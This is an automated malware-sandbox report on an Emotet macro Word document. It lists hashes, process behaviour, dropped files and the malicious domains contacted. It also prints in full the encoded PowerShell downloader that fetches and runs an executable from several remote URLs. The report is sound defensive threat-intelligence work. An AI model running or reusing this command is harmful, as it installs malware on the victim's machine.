File name: [email protected]
Full analysis: https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 21, 2021, 19:15:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: B92021CA10AED3046FC3BE5AC1C2A094
SHA1: 0FB1AD5B53CDD09A7268C823EC796A6E623F086F
SHA256: C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807
SSDEEP: 3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the date of Windows installation

      • powershell.exe (PID: 2152)
    • Reads the computer name

      • powershell.exe (PID: 2152)
    • Checks supported languages

      • powershell.exe (PID: 2152)
    • Reads Environment values

      • powershell.exe (PID: 2152)
    • PowerShell script executed

      • powershell.exe (PID: 2152)
    • Creates files in the user directory

      • powershell.exe (PID: 2152)
    • Executed via WMI

      • powershell.exe (PID: 2152)
    • Executes application which crashes

      • powershell.exe (PID: 2152)
  • INFO

    • Reads the computer name

      • WINWORD.EXE (PID: 3296)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2152)
    • Reads mouse settings

      • WINWORD.EXE (PID: 3296)
    • Checks supported languages

      • WINWORD.EXE (PID: 3296)
      • ntvdm.exe (PID: 968)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3296)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3296)
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 445
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 3
DocSecurity: None
Application: Microsoft Office Word
Characters: 380
Words: 66
Pages: 1
TotalEditTime: -
Template: Normal.dotm
ModifyDate: 2019:09:16 12:22:00Z
CreateDate: 2019:09:16 12:22:00Z
RevisionNumber: 1
LastModifiedBy: -
Keywords: -

XMP

Description: -
Creator: -
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 3939
ZipCompressedSize: 524
ZipCRC: 0x247a0b47
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
Total processes: 39
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 0

Behavior graph (process chain): start > winword.exe (no specs) > powershell.exe > ntvdm.exe (no specs)

Process information

PID: 3296
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\[email protected]"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2152
CMD: powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 968
CMD: "C:\Windows\system32\ntvdm.exe" -i1
Path: C:\Windows\system32\ntvdm.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: NTVDM.EXE
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 8 309
Read events: 7 487
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 3
Text files: 40
Unknown types: 3

Dropped files

PID | Process | Filename | Type

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr | -
MD5: -
SHA256: -

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\[email protected] | pgc
MD5: 5E6044E97F1C4BDAAF16B5DA6279997D
SHA256: 6270E0AD563A5C7B5090E4CCF1B7A1A92E34A4D8D1B3D92F96A6E9779FFDEC57

3296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
MD5: 3656172ECE5D5D52FAA94F1C603083D6
SHA256: 8115F3FE078B4EC6C179BC53ED9407DD1FD0A04D9B4D503763A49099D2D9E8B5

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.dat | image
MD5: B968160E32B2FBEBB3FF6C55F5B4885B
SHA256: 7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93B6FB42.dat | image
MD5: C1F138C3F19B5545D60B3B5D4C2BA4FC
SHA256: 80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.dat | image
MD5: B2B55276284D41BAA290155CB55A94E2
SHA256: C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98D539F8.dat | image
MD5: 23EE1904F10A3641361F163E000DFF66
SHA256: 58D13515C530476E847D64718305B845B4110F87C88C7761BA9A053653499001

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E29814.dat | image
MD5: 48D1B152FC6F014B9C45DBB5A7941F4D
SHA256: 61CBDA84CEB5254E134CB6F59EA9D73812B48EF380298D53AEE6CC09BAA966F3

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A830BD7.wmf | image
MD5: A53FD310182B8DA14BE0E22A440105EA
SHA256: 52A469268392E4252E6EF7F8D42BE5F6A02BE7C3383E5E71D94E0789591FF1DC

3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40458E9F.wmf | image
MD5: 47494691A7204F143E5910EF1947C99E
SHA256: CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759
HTTP(S) requests: 2
TCP/UDP connections: 7
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2152 | powershell.exe | GET | 301 | 173.198.248.218:80 | http://www.deepikarai.com/bangalore-escorts.php | US | html | 256 b | malicious
2152 | powershell.exe | GET | 200 | 208.91.197.27:80 | http://blockchainjoblist.com/wp-admin/014080/ | US | html | 18.0 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2152 | powershell.exe | 208.91.197.27:80 | blockchainjoblist.com | Confluence Networks Inc | US | malicious
2152 | powershell.exe | 173.198.248.218:80 | deepikarai.com | Turnkey Internet Inc. | US | unknown
2152 | powershell.exe | 78.41.204.28:443 | yeuquynhnhai.com | Snel.com B.V. | NL | malicious
2152 | powershell.exe | 173.198.248.218:443 | deepikarai.com | Turnkey Internet Inc. | US | unknown

DNS requests

Domain | IP | Reputation
blockchainjoblist.com | 208.91.197.27 | malicious
womenempowermentpakistan.com | - | malicious
atnimanvilla.com | - | malicious
yeuquynhnhai.com | 78.41.204.28 | malicious
deepikarai.com | 173.198.248.218 | suspicious
www.deepikarai.com | 173.198.248.218 | unknown

Threats

No threats detected
No debug info